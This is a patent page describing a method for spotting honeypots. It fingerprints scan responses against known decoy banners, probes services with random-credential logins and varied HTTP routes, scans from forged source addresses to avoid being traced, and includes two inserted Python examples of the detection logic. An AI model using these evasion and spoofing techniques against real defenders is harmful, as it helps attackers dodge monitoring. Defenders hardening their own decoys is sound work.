CN114826663A - Honeypot identification method, honeypot identification device, honeypot identification equipment and storage medium - Google Patents

Honeypot identification method, honeypot identification device, honeypot identification equipment and storage medium

Info

Publication number: CN114826663A
Application number: CN202210269896.8A
Authority: CN (China)
Legal status: Granted (active)
Other languages: Chinese (zh)
Other versions: CN114826663B (en)
Inventors: 方永成, 赵重浩, 刘茂林, 龚亮华
Current and original assignee: Fengtai Technology Beijing Co ltd
Application filed by Fengtai Technology Beijing Co ltd; priority to CN202210269896.8A; published as CN114826663A; granted and published as CN114826663B.

Classifications

    • H ELECTRICITY > H04 ELECTRIC COMMUNICATION TECHNIQUE > H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION > H04L 63/00 Network architectures or network communication protocols for network security > H04L 63/14 ... for detecting or protecting against malicious traffic > H04L 63/1441 Countermeasures against malicious traffic > H04L 63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F 16/00 Information retrieval; Database structures therefor; File system structures therefor > G06F 16/20 ... of structured data, e.g. relational data > G06F 16/25 Integrating or interfacing systems involving database management systems > G06F 16/252 ... between a Database Management System and a front-end application
    • G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F 16/00 Information retrieval; Database structures therefor; File system structures therefor > G06F 16/90 Details of database functions independent of the retrieved data types > G06F 16/95 Retrieval from the web > G06F 16/953 Querying, e.g. by the use of web search engines
    • G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F 9/00 Arrangements for program control, e.g. control units > G06F 9/06 ... using stored programs, i.e. using an internal store of processing equipment to receive or retain programs > G06F 9/44 Arrangements for executing specific programs > G06F 9/445 Program loading or initiating > G06F 9/44521 Dynamic linking or loading; Link editing at or after load time, e.g. Java class loading > G06F 9/44526 Plug-ins; Add-ons

Landscapes

  • Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Databases & Information Systems (AREA)
  • Software Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Computer Security & Cryptography (AREA)
  • Data Mining & Analysis (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The application discloses a honeypot identification method, a honeypot identification device, honeypot identification equipment and a storage medium, and belongs to the field of network security. The method comprises the following steps: first, a scanning request is sent to a target port of a target to be identified, and a scanning response from the target port is obtained. If a field in the scanning response matches any characteristic fingerprint in the honeypot fingerprint library, it is determined that a honeypot exists in the target. If the fields in the scanning response match none of the characteristic fingerprints in the honeypot fingerprint library, a target honeypot identification plug-in matched with the target port is determined, and it is determined from the result of the interaction between the target honeypot identification plug-in and the target port that a honeypot exists in the target. The honeypot fingerprint library comprises characteristic fingerprints of various honeypots, and the target honeypot identification plug-in is used for interacting with the target port. Honeypots in the target can therefore be identified either through the honeypot fingerprint library or through the target honeypot identification plug-in, so more types of honeypot can be identified, the universality is better, and the diversity of honeypots in network security is accommodated.

Description

Honeypot identification method, honeypot identification device, honeypot identification equipment and storage medium
Technical Field
The present application relates to the field of network security, and in particular, to a honeypot identification method, apparatus, device, and storage medium.
Background
With the development of the internet, the internet of things, big data and similar technologies, industries and enterprises increasingly move their operations online, and network security becomes more and more important. Honeypot identification technology, also called anti-honeypot technology, is used to identify honeypots deployed by a defender from the perspective of an attacker, and is an important technical means in attack and defense in the field of network security. For example, from the angle of network detection, accurately and effectively identifying honeypots with honeypot identification technology allows the situation in cyberspace to be grasped and traps in cyberspace to be effectively avoided. A honeypot is an active trapping technology: it lures an attacker into accessing it by simulating a host system or a port service, so that the attacker's behaviour is captured, monitored and tracked.
However, most current research on honeypot identification technology is limited to identifying honeypots of a single type; the identified honeypots are of one kind and the technique has poor universality, so it cannot accommodate the diversity of honeypots in network security.
Disclosure of Invention
The application provides a honeypot identification method, a honeypot identification device, honeypot identification equipment and a storage medium, which have the advantages of more identifiable honeypots, better universality and capability of meeting the diversity of honeypots in network security. The technical scheme is as follows:
In a first aspect, a honeypot identification method is provided, which is applied to a first device and includes:
for a target to be identified, sending a scanning request to a target port of the target;
acquiring a scanning response from the target port;
if the fields in the scanning response are determined to be matched with any characteristic fingerprint in a honeypot fingerprint library, determining that honeypots exist in the target, wherein the honeypot fingerprint library comprises the characteristic fingerprints of various honeypots;
and if the fields in the scanning response are determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, wherein the target honeypot identification plug-in is used for interacting with the target port.
As an example, the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy, and the target honeypot identification plug-in is used for interacting with the target port according to the target interaction policy;
before determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, the method further comprises the following steps:
interacting with the target port through the target honeypot identification plug-in according to the target interaction strategy to obtain an interaction result of the target honeypot identification plug-in and the target port;
the determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port comprises:
determining whether the interaction result meets a preset condition;
and if the interaction result meets the preset condition, determining that the honeypots exist in the target.
As an example, the preset condition includes any one of the following conditions:
a first preset field exists in the interaction result;
under the condition that the target interaction strategy is that the target port is logged in for multiple times by using the account and the password which are randomly generated, the target port is logged in for multiple times successfully;
and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
As one example, the determining a target honeypot identification plug-in that matches the target port includes:
determining a target service provided by the target port;
determining a honeypot identification plug-in matching the target service from a plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
As an example, each honeypot identification plug-in in the plurality of honeypot identification plug-ins has a corresponding interaction policy;
the step of determining the honeypot identification plug-in which matches the target service from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in comprises any one of the following modes:
if the target service comprises an SSH service, an FTP service, a Telnet service or a MySQL service, determining, from the plurality of honeypot identification plug-ins, the honeypot identification plug-in whose corresponding interaction strategy is logging in to the target port multiple times with a randomly generated account and password, as the target honeypot identification plug-in;
and if the target service comprises an HTTP service and an HTTPS service, determining, from the plurality of honeypot identification plug-ins, the honeypot identification plug-in whose corresponding interaction strategy is requesting different routes from the target port multiple times, as the target honeypot identification plug-in.
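The plug-in selection and preset-condition logic above, written as an added example (not the patent's own code) in the form a decoy operator would use to audit their own honeypot for the tells this method keys on: the plug-in names, the `InteractionResult` structure, the `FIRST_PRESET_FIELD` placeholder and all sample results are assumptions.

```python
"""Second stage of the described method as a defender's self-audit: pick the
honeypot identification plug-in by the service behind a port, then test a
recorded interaction result against the preset conditions. The plug-in
names, the InteractionResult structure and all sample data are constructed
for this example; the patent names none of them."""
from dataclasses import dataclass, field
from typing import Optional

# Interaction strategies exactly as the description assigns them to services.
RANDOM_LOGIN = "login-with-random-credentials-multiple-times"  # SSH, FTP, Telnet, MySQL
ROUTE_PROBE = "request-different-routes-multiple-times"        # HTTP, HTTPS

SERVICE_STRATEGY = {
    "ssh": RANDOM_LOGIN, "ftp": RANDOM_LOGIN,
    "telnet": RANDOM_LOGIN, "mysql": RANDOM_LOGIN,
    "http": ROUTE_PROBE, "https": ROUTE_PROBE,
}

# Assumed plug-in names (hypothetical), one per interaction strategy.
PLUGIN_BY_STRATEGY = {RANDOM_LOGIN: "login_plugin", ROUTE_PROBE: "route_plugin"}

# The "first preset field" whose mere presence in a result is a tell.
# The patent does not disclose its value, so a labelled placeholder is used.
FIRST_PRESET_FIELD = "<first-preset-field-placeholder>"


@dataclass
class InteractionResult:
    """What a plug-in recorded while interacting with the port (constructed)."""
    strategy: str
    # RANDOM_LOGIN: success flag per attempt, each with fresh random credentials
    login_outcomes: list = field(default_factory=list)
    # ROUTE_PROBE: response body keyed by the distinct route requested
    route_responses: dict = field(default_factory=dict)
    # any other fields observed during the interaction
    raw_fields: list = field(default_factory=list)


def select_plugin(service: str) -> Optional[str]:
    """Return the plug-in matching the service, or None if none applies."""
    strategy = SERVICE_STRATEGY.get(service.strip().lower())
    return PLUGIN_BY_STRATEGY[strategy] if strategy else None


def meets_preset_condition(result: InteractionResult) -> Optional[str]:
    """Name the preset condition the result meets, or None.

    Any one suffices: (1) the first preset field is present; (2) under the
    random-credential strategy every login attempt succeeded; (3) under the
    route strategy every distinct route returned the same response.
    "Multiple times" is read as two or more, as the description defines
    "a plurality"."""
    if FIRST_PRESET_FIELD in result.raw_fields:
        return "first-preset-field-present"
    if (result.strategy == RANDOM_LOGIN
            and len(result.login_outcomes) >= 2
            and all(result.login_outcomes)):
        return "all-random-logins-succeeded"
    if (result.strategy == ROUTE_PROBE
            and len(result.route_responses) >= 2
            and len(set(result.route_responses.values())) == 1):
        return "identical-responses-for-different-routes"
    return None


def audit_port(service: str, result: InteractionResult) -> dict:
    """Self-audit verdict for one decoy port: which plug-in the method would
    pick and whether the recorded interaction gives the decoy away."""
    plugin = select_plugin(service)
    if plugin is None:
        return {"plugin": None, "condition": None, "honeypot_tell": False}
    condition = meets_preset_condition(result)
    return {"plugin": plugin, "condition": condition,
            "honeypot_tell": condition is not None}


if __name__ == "__main__":
    # Constructed sample: a low-interaction SSH decoy that accepts any credentials,
    # and a web decoy that serves the same page for every route.
    ssh_result = InteractionResult(RANDOM_LOGIN, login_outcomes=[True, True, True])
    web_result = InteractionResult(ROUTE_PROBE, route_responses={
        "/": "<html>welcome</html>", "/admin": "<html>welcome</html>",
        "/does-not-exist": "<html>welcome</html>"})
    print(audit_port("ssh", ssh_result))
    print(audit_port("https", web_result))
```

A decoy that passes this audit still has to survive the fingerprint stage, which the description treats separately.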
As an example, the sending the scan request to the target port includes:
generating at least one fake source device address according to the source device address of the first device;
constructing a plurality of scanning requests according to the source device address and the at least one pseudo source device address, wherein the plurality of scanning requests at least comprise a first scanning request and a second scanning request, the first scanning request is a request sent by the source device address, and the second scanning request is a request sent by any pseudo source device address in the at least one pseudo source device address which is forged;
sending the plurality of scan requests to the target port to spoof scan the target port.
As an example, the method further comprises:
downloading a file from the target, extracting the macro code of the file, and determining that a honeypot exists in the target if it is determined from the macro code that a honey mark (honeytoken) exists in the target;
or,
determining the running processes in the target, and if the process name of a running process is determined to have a second preset field, determining that a honeypot exists in the target.
In a second aspect, there is provided a honeypot identification apparatus, the apparatus comprising:
a sending module, configured to send a scan request to a target port of a target to be identified;
an acquisition module for acquiring a scan response from the target port;
a first determination module, configured to determine that a honeypot exists in the target if it is determined that the field in the scan response matches any one of the feature fingerprints in a honeypot fingerprint library, where the honeypot fingerprint library includes feature fingerprints of a plurality of honeypots;
and the second determination module is used for determining a target honeypot identification plug-in matched with the target port if the fields in the scanning response are determined not to be matched with all the characteristic fingerprints in the honeypot fingerprint library, determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port, and the target honeypot identification plug-in is used for interacting with the target port.
As an example, the interaction policy corresponding to the target honeypot identification plug-in is a target interaction policy, and the target honeypot identification plug-in is used for interacting with the target port according to the target interaction policy;
the apparatus further comprises an interaction module:
the interaction module is used for interacting with the target port through the target honeypot identification plug-in according to the target interaction strategy to obtain an interaction result of the target honeypot identification plug-in and the target port;
the second determining module is further configured to determine whether the interaction result meets a preset condition, and if the interaction result meets the preset condition, determine that a honeypot exists in the target.
As an example, the preset condition includes any one of the following conditions:
a first preset field exists in the interaction result;
under the condition that the target interaction strategy is that the target port is logged in for multiple times by using a randomly generated account and a password, the target port is logged in for multiple times successfully;
and under the condition that the target interaction strategy is to request different routes for the target port for multiple times, the response results from the target port after the different routes are requested for multiple times are the same.
As an example, the second determining module is further configured to determine a target service provided by the target port;
determining a honeypot identification plug-in matching the target service from a plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
As an example, each honeypot identification plug-in in the plurality of honeypot identification plug-ins has a corresponding interaction policy;
the second determining module is further configured to determine, if the target service includes an SSH service, an FTP service, a Telnet service or a MySQL service, the honeypot identification plug-in whose corresponding interaction policy is to log in to the target port multiple times with a randomly generated account and password, from among the plurality of honeypot identification plug-ins, as the target honeypot identification plug-in;
the second determining module is further configured to determine, if the target service includes an HTTP service and an HTTPS service, the honeypot identification plug-in whose corresponding interaction policy is to request different routes from the target port multiple times, from among the plurality of honeypot identification plug-ins, as the target honeypot identification plug-in.
As an example, the sending module is further configured to generate at least one fake source device address according to the source device address of the first device;
constructing a plurality of scanning requests according to the source device address and the at least one pseudo source device address, wherein the plurality of scanning requests at least comprise a first scanning request and a second scanning request, the first scanning request is a request sent by the source device address, and the second scanning request is a request sent by any pseudo source device address in the at least one pseudo source device address which is forged;
sending the plurality of scan requests to the target port to spoof scan the target port.
As one example, the apparatus further comprises a third determining module or a fourth determining module:
the third determining module is configured to download a file from the target, extract the macro code of the file, and determine that a honeypot exists in the target if it is determined from the macro code that a honey mark (honeytoken) exists in the target;
and the fourth determining module is configured to determine the running processes in the target, and if the process name of a running process is determined to have the second preset field, determine that a honeypot exists in the target.
In a third aspect, a computer device is provided, the computer device comprising a memory, a processor and a computer program stored in the memory and executable on the processor, the computer program, when executed by the processor, implementing the above honeypot identification method.
In a fourth aspect, a computer-readable storage medium is provided, which stores a computer program that, when executed by a processor, implements the honeypot identification method described above.
The technical scheme provided by the embodiment of the application has the following beneficial effects:
In the embodiment of the application, for the target to be identified, a scanning request is sent to the target port of the target, and a scanning response from the target port is then obtained. If a field in the scanning response matches any characteristic fingerprint in the honeypot fingerprint library, it is determined that a honeypot exists in the target. If the fields in the scanning response match none of the characteristic fingerprints in the honeypot fingerprint library, a target honeypot identification plug-in matched with the target port is determined, and it is determined from the result of the interaction between the target honeypot identification plug-in and the target port that a honeypot exists in the target. The honeypot fingerprint library comprises characteristic fingerprints of various honeypots, and the target honeypot identification plug-in is used for interacting with the target port. Honeypots in the target can be identified by matching the scanning response of the target port against the characteristic fingerprints in the honeypot fingerprint library, and can also be identified from the result of the interaction between the target honeypot identification plug-in and the target port, so more types of honeypot can be identified, the universality is better, and the diversity of honeypots in network security is accommodated.
Drawings
In order to more clearly illustrate the technical solutions in the embodiments of the present application, the drawings needed to be used in the description of the embodiments are briefly introduced below, and it is obvious that the drawings in the following description are only some embodiments of the present application, and it is obvious for those skilled in the art to obtain other drawings based on these drawings without creative efforts.
Fig. 1 is a flowchart of a honeypot identification method according to an embodiment of the present application;
fig. 2 is a schematic structural diagram of a honeypot identification apparatus provided in an embodiment of the present application;
fig. 3 is a schematic structural diagram of a computer device according to an embodiment of the present application.
Detailed Description
To make the objects, technical solutions and advantages of the present application more clear, embodiments of the present application will be described in further detail below with reference to the accompanying drawings.
It should be understood that reference to "a plurality" in this application means two or more. In the description of the present application, "/" means "or" unless otherwise stated, for example, a/B may mean a or B; "and/or" herein is only an association relationship describing an associated object, and means that there may be three relationships, for example, a and/or B, which may mean: a exists alone, A and B exist simultaneously, and B exists alone. In addition, for the convenience of clearly describing the technical solutions of the present application, the terms "first", "second", and the like are used to distinguish the same items or similar items having substantially the same functions and actions. Those skilled in the art will appreciate that the terms "first," "second," etc. do not denote any order or quantity, nor do the terms "first," "second," etc. denote any order or importance.
Before explaining the embodiments of the present application in detail, an application scenario of the embodiments of the present application will be described.
Attack and defense confrontation is a normal state in the field of network security, and with the improvement of defense technology and attack technology, the network security gradually develops from initial passive defense to active defense. Honeypots, as an active defense technology, are important technical means for detecting threats in defense and attack, gradually attract attention in recent years, and are widely deployed. The honeypot is deployed in a defending party in the attack and defense countermeasure, is an active cheating technology, and can be used for cheating the attacking party in the attack and defense countermeasure to access, further obtaining information such as an equipment address and an account number of the attacking party, even countering the attacking party and controlling equipment of the attacking party.
As an example, the honeypot is deployed in a device of the defender, and the defender may analyze an attack behavior of the attacker by using the honeypot, such as analyzing a scan request of the attacker, and obtain information of a device address, an account, and the like of the attacker according to the scan request.
As an example, honeypots can be classified into low-interaction honeypots, medium-interaction honeypots, and high-interaction honeypots according to their interaction characteristics. The low-interaction honeypot is a honeypot which only simulates some port services, and has a low interaction degree with an attacker. The medium-interaction honeypot is a honeypot which is between a low-interaction honeypot and a high-interaction honeypot, is more real than the low-interaction honeypot, and can simulate more port services. The high-interaction honeypot can simulate a host system, namely simulate an IP (Internet Protocol) address of the host, can interact with equipment of an attacker like a real system, and is most difficult to be identified by the attacker.
Because honeypot trapping is a game between attacker and defender, the question of how an attacker can effectively identify the honeypots deployed by the defender, avoid them and stay out of the defender's traps, that is, research on honeypot identification technology, is of great significance to network security. For example, from the angle of network detection, accurately and effectively identifying honeypots with honeypot identification technology allows the situation in cyberspace to be grasped and traps in cyberspace to be effectively avoided.
In addition, the honeypot identification technology is beneficial to pertinently constructing and optimizing honeypots, improving the authenticity of honeypots and improving the identification resistance of honeypots, so that the capability of honeypots for monitoring network security threats is enhanced.
Based on the above, the embodiment of the application provides a honeypot identification method, which can identify more honeypots in types and better in universality and meets the diversity of honeypots in network security.
The honeypot identification method provided by the embodiment of the present application is explained in detail below.
Fig. 1 is a flowchart of a honeypot identification method provided by an embodiment of the present application, where the method may be applied to a first device, and the first device may be a computer device. As shown in fig. 1, the method may include the following steps.
Step 101, for a target to be identified, a first device sends a scan request to a target port of the target.
The first device is a device of an attacker, and the attacker can attack the defender through the first device to identify the honeypots deployed in the defender.
The target to be identified may refer to a second device of the defender, or to a port of the second device. The target port of the target refers to a port opened in the target, and the target may have one or more target ports.
The scanning request is used for scanning the target port, so that information such as the state, account or existing vulnerability of the target port is obtained. The state of the target port includes an open state or a closed state, the port in the open state may also be referred to as a live port, and the open state means that the target may communicate through the target port, that is, the target may provide a target service corresponding to the target port through the target port.
For example, the target to be identified is the second device, and before the first device sends the scan request to the target port of the target, the first device may first determine the target device address of the second device, determine that at least one port is opened in the target device address, take each of the at least one port as the target port, and then send the scan request to the target port to scan the target port. The ports are used for providing services, and the services provided by different ports may be the same or different.
The target device address may be one or more of a target IP address, a target MAC (Media Access Control) address, and the like of the second device.
As an example, the first device may perform a port viability test on the target device address to obtain the open ports at that address. If it is determined that at least one alive port exists at the target device address, each alive port is taken in turn as the target port, a scan request is sent to it, and the following steps 102 to 104 are performed. Otherwise, the target device address is stored in a database of addresses to be identified, so that a port viability test and port scan can be carried out on it later.
The first device may send the scan request to the target port of the target over a wireless communication technology. The scan request may be transmitted through the network in message form and may include a source device address and a target device address, where the source device address includes one or more of the source IP address, source MAC address and source port number of the first device, and the target device address includes one or more of the target IP address, target MAC address and target port number of the second device.
As an example, the first device may also send multiple scan requests to the target port. For example, the first device generates at least one fake source device address according to the source device address of the first device, constructs a plurality of scanning requests according to the source device address and the at least one fake source device address, and sends the plurality of scanning requests to the target port to perform spoofing scanning on the target port.
The plurality of scanning requests at least comprise a first scanning request and a second scanning request, the first scanning request is a request sent by a source device address, and the second scanning request is a request sent by any pseudo source device address in at least one pseudo source device address which is forged.
That is, the first scan request is a request sent by the first device, and the first scan request includes a source device address and a target device address. The other scan requests except the first scan request in the plurality of scan requests are requests sent by fake source devices, and the other scan requests except the first scan request in the plurality of scan requests comprise fake source device addresses and target device addresses. Thus, after receiving the multiple scan requests, the second device cannot determine the first device from the multiple scan requests, that is, cannot determine the source device address, and cannot capture, monitor and track the behavior of the first device.
Wherein the pseudo source device address may include one or more of a pseudo source IP address, a pseudo source MAC address, and a pseudo source port number of a fake pseudo source device.
As one example, the first device may forge the at least one pseudo source device address and construct the plurality of scan requests programmatically. For example, at least one pseudo source device address is forged and a plurality of scan requests are constructed with the Scapy program. Scapy is a Python program with which the first device can forge or send network packets, for example forge at least one fake source device address and send multiple scan requests to the target port.
As one example, after a first device sends a scan request to a target port of a target, the target (second device) may receive the scan request, generate a scan response from the scan request, and send the scan response to the first device.
At step 102, the first device obtains a scan response from the target port.
If the target port of the target provides the honeypot simulation service, namely the target port is a honeypot simulation port, a field corresponding to the characteristic fingerprint of the honeypot exists in a scanning response message sent by the target to the first device.
The first device can store the characteristic fingerprint corresponding to each honeypot in multiple honeypots in advance. For example, the characteristic fingerprints of various honeypots can be stored in a characteristic fingerprint library.
As an example, please refer to table 1, where table 1 is a comparison table of feature fingerprints of multiple honeypots in a honeypot fingerprint library provided in an embodiment of the present application.
TABLE 1
[Table 1 was provided as images (BDA0003554208890000091, BDA0003554208890000101) and its rows are not recoverable here. The entries cited in the text are: Conpot, port 102, "Serial number of module: 88111222"; Conpot, "Device Identification: Siemens SIMATIC S7-200".]
The characteristic fingerprint is the core characteristic of the scanning response of the honeypot, and can be used as a reference basis for matching with the field in the scanning response from the target port.
For example, as shown in table 1, if the service provided by the target port is the honeypot simulation service of the Conpot honeypot, and the characteristic fingerprint corresponding to Conpot is "Serial number of module: 88111222", the scan response message sent by the target to the first device will contain the field "Serial number of module: 88111222". Likewise, if the target port provides the honeypot simulation service of the Conpot honeypot and the corresponding characteristic fingerprint is "Device Identification: Siemens SIMATIC S7-200", the field "Device Identification: Siemens SIMATIC S7-200" will be present in the scan response message sent by the target to the first device. Both strings are identification values from Conpot's default S7comm (port 102) template, so the fingerprint is only as reliable as the default configuration: an operator who edits the template changes the fingerprint.
As an example, the honeypot simulation services provided by one and the same honeypot may also differ by port. For the Conpot honeypot in table 1, if it provides its honeypot simulation service through simulated port 102, that port provides the simulation service corresponding to the S7comm protocol; if it provides the service through simulated port 502, that port provides the simulation service corresponding to the protocol simulated there (Modbus/TCP in Conpot's default template).
It should be noted that table 1 is only an example of a honeypot fingerprint library containing the characteristic fingerprints of a plurality of honeypots and does not limit the honeypot fingerprint library. For example, the library may include characteristic fingerprints of more kinds of honeypot, or one honeypot may correspond to other characteristic fingerprints; the embodiment of the present application does not limit the honeypot fingerprint library.
Typically, honeypots included in the honeypot fingerprint library are low-interaction or medium-interaction honeypots. The more types of honeypots included in the honeypot fingerprint library, the more types of honeypots that can be identified by the first device.
After the first device acquires the scan response from the target port, it may compare the fields in the scan response with each characteristic fingerprint in the honeypot fingerprint library one by one, to determine whether any field in the scan response matches any characteristic fingerprint in the library.
Step 103, if the first device determines that the field in the scanning response matches any one of the characteristic fingerprints in the honeypot fingerprint library, it determines that honeypots exist in the target.
Wherein the honeypot fingerprint database comprises characteristic fingerprints of various honeypots. For example, as shown in table 1, the honeypot fingerprint database includes characteristic fingerprints corresponding to each honeypot of the plurality of honeypots. The feature fingerprint corresponding to each honeypot is the core feature of the scanning response of the honeypot, and can be used as a reference for matching with the field in the scanning response of the target port.
If the field in the obtained scanning response from the target port is determined to be matched with any characteristic fingerprint in the honeypot fingerprint library by the first device, the target port is determined to provide honeypot simulation service, the target port is a honeypot simulation port, and honeypots exist in targets to be identified.
Because the honeypot fingerprint library contains the characteristic fingerprints of a plurality of honeypots, the first device can identify a plurality of honeypots; that is, the first device identifies more kinds of honeypot, has better generality, and copes with the diversity of honeypots deployed in network security.
For example, if the first device determines that the scanning response includes the field "Serial number of module: 88111222", it determines that the target port provides the honeypot simulation service and that honeypots exist in the target to be identified.
In addition, the first device may also determine the kind of honeypot present in the target from the library of honeypot fingerprints. For example, the first device determines the type of the honeypot according to the field included in the scan response and the port number corresponding to the scan response.
For example, as shown in table 1, if the first device determines that the target port number is 102 and the obtained scan response contains the field "Serial number of module: 88111222", it may determine not only that a honeypot exists in the target, but also that the honeypot existing in the target is a Conpot honeypot.
Furthermore, if the first device determines that no field in the scan response matches any characteristic fingerprint in the honeypot fingerprint library, it cannot conclude that the service provided by the target port is not a honeypot simulation service, that is, it cannot conclude that no honeypot exists in the target to be identified: a fingerprint miss only means that the honeypot is not in the library, or that it has been reconfigured away from its default banner. In this case, more kinds of honeypot can be identified by adding characteristic fingerprints to the library, or by other means, for example by interacting with the target port and identifying the honeypot during the interaction.
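Step 103 as detection logic over constructed scan responses, as an added example that is not part of the patent: the library holds the two Conpot fingerprints quoted above (the port column, the regular-expression form and the third, hypothetical entry are assumptions of the example), a match on any field flags a honeypot, the kind is attributed only when the port also agrees, and a miss is reported as undetermined rather than as "no honeypot".

```python
import re

# Constructed fingerprint library. The two Conpot fingerprints are the ones the text quotes;
# the "port" field (None = any port), the regex form and the third entry are assumptions.
FINGERPRINT_LIBRARY = [
    {"honeypot": "Conpot", "port": 102,
     "pattern": re.compile(r"Serial number of module:\s*88111222")},
    {"honeypot": "Conpot", "port": 102,
     "pattern": re.compile(r"Device Identification:\s*Siemens SIMATIC S7-200")},
    # hypothetical entry, only to show a port-independent fingerprint
    {"honeypot": "ExampleHoneypot (hypothetical)", "port": None,
     "pattern": re.compile(r"X-Honeypot-Demo:\s*1")},
]

# Constructed scan responses, as a scanner would render the banner of the target port.
SAMPLE_CONPOT_RESPONSE = (
    b"System Name: SIMATIC 300(1)\n"
    b"Serial number of module: 88111222\n"
    b"Device Identification: Siemens SIMATIC S7-200\n"
)
SAMPLE_REAL_SSH = b"SSH-2.0-OpenSSH_9.3\r\n"


def response_fields(scan_response: bytes) -> list:
    """Split a scan response into text fields (line- or NUL-separated records)."""
    text = scan_response.decode("utf-8", errors="replace")
    return [f.strip() for f in re.split(r"[\r\n\x00]+", text) if f.strip()]


def match_fingerprints(port: int, scan_response: bytes) -> dict:
    """Compare every field with every fingerprint in the library.

    Returns {"honeypot": True or None, "kinds": [...], "matched": [...]}.
    None (not False) means undetermined: a miss does not prove that no honeypot is present,
    so the caller should fall through to the plug-in interaction of step 104.
    The kind is attributed only when the fingerprint's port also matches (field + port).
    """
    fields = response_fields(scan_response)
    matched, kinds = [], set()
    for fp in FINGERPRINT_LIBRARY:
        for field in fields:
            if fp["pattern"].search(field):
                matched.append(field)
                if fp["port"] is None or fp["port"] == port:
                    kinds.add(fp["honeypot"])
    return {"honeypot": True if matched else None, "kinds": sorted(kinds), "matched": matched}


if __name__ == "__main__":
    print(match_fingerprints(102, SAMPLE_CONPOT_RESPONSE))
    print(match_fingerprints(22, SAMPLE_REAL_SSH))
```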
And step 104, if the first device determines that the fields in the scanning response are not matched with all the characteristic fingerprints in the honeypot fingerprint library, determining a target honeypot identification plug-in matched with the target port, and determining that honeypots exist in the target according to the interaction result of the target honeypot identification plug-in and the target port.
Wherein the target honeypot identification plug-in is used for interacting with the target port.
A plurality of honeypot identification plug-ins are pre-installed in the first device. Each honeypot identification plug-in has a corresponding interaction strategy and interacts with a port according to that strategy.
The interaction strategies corresponding to the various honeypot identification plug-ins can be the same or different.
For example, please refer to table 2, where table 2 is a comparison table of honeypot identification plug-in for identifying honeypots provided in the embodiments of the present application.
TABLE 2
[Table 2 was provided as images (BDA0003554208890000121, BDA0003554208890000131) and its rows are not recoverable here. The entries cited in the text are: port 3306 (MySQL), strategies "log in multiple times with randomly generated account names and passwords" and "log in once with a randomly generated account name and password"; any port 1 to 65535 (HTTP/HTTPS), strategy "request the target port multiple times with different routes"; any port, strategy "perform a TCP three-way handshake with the port"; scan response containing "GPON", strategy "request the target port multiple times with arbitrary routes"; also 3389 remote desktop, Memcached and Redis services.]
As shown in table 2, the first device may determine the target honeypot identification plug-in matching the target port from the plurality of pre-installed honeypot identification plug-ins according to the plug-in use condition. Each of the plurality of honeypot identification plug-ins has at least one corresponding honeypot identification mode, so the first device can identify honeypots through the target honeypot identification plug-in according to its honeypot identification mode.
The service provided by different ports may be different, and the first device may determine, from the plurality of honeypot identification plug-ins, a target honeypot identification plug-in that matches the target port according to the target service provided by the target port.
For example, the first device may determine the target service provided by the target port, and then select the honeypot identification plug-in matching that target service from the plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
The target service may include any one of a Secure Shell (SSH) service, a File Transfer Protocol (FTP) service, a Telnet service, a MySQL service, a Hypertext Transfer Protocol (HTTP) service and an HTTP over TLS (HTTPS) service.
As an example, as shown in table 2, the first device first determines that the target port number of the target port is 3306, and since the 3306 port provides mySQL service, a honeypot identification plug-in matching the mySQL service can be determined from a plurality of honeypot identification plug-ins as the target honeypot identification plug-in.
The honeypot identification mode can comprise an interaction strategy and a honeypot identification mode. That is, each honeypot identification plug-in the plurality of honeypot identification plug-ins has at least one interaction policy and a honeypot identification manner corresponding to the interaction policy. The first device can interact with the port according to the interaction strategy to obtain an interaction result, determine whether the interaction result meets a preset condition according to a honeypot identification mode, and determine that honeypots exist in the target if the interaction result meets the preset condition.
For example, each of the plurality of honeypot identification plug-ins has a corresponding interaction strategy, and the interaction strategy corresponding to the target honeypot identification plug-in is the target interaction strategy. The first device may determine the corresponding target service from the target port, determine the corresponding target interaction strategy from the target service, and select, from the plurality of honeypot identification plug-ins, the plug-in whose interaction strategy is the target interaction strategy as the target honeypot identification plug-in.
The interaction policies corresponding to different target services may be the same or different. That is, the target honeypot identification plug-ins determined from the plurality of honeypot identification plug-ins may be the same or different for different target services.
For example, if the target service is an SSH, FTP, Telnet or MySQL service, the interaction strategy corresponding to the target service may be to log in to the target port multiple times using randomly generated account names and passwords, and the first device may select, from the plurality of honeypot identification plug-ins, the plug-in whose interaction strategy is "log in to the target port multiple times using randomly generated account names and passwords" as the target honeypot identification plug-in. If the target service is an HTTP or HTTPS service, the interaction strategy corresponding to the target service may be to request the target port multiple times with different routes, and the first device may select, from the plurality of honeypot identification plug-ins, the plug-in whose interaction strategy is "request the target port multiple times with different routes" as the target honeypot identification plug-in.
In the embodiment of the present application, the SSH, FTP, Telnet, MySQL, HTTP and HTTPS services are only examples of the target service and do not limit it. The target service may be any service that a computer device can provide; as shown in table 2, it may also be the remote desktop service on port 3389, a Memcached service or a Redis service.
The number of the target honeypot identification plug-ins matched with the target ports and the number of the interaction strategies corresponding to the target honeypot identification plug-ins are not limited in the embodiment of the application.
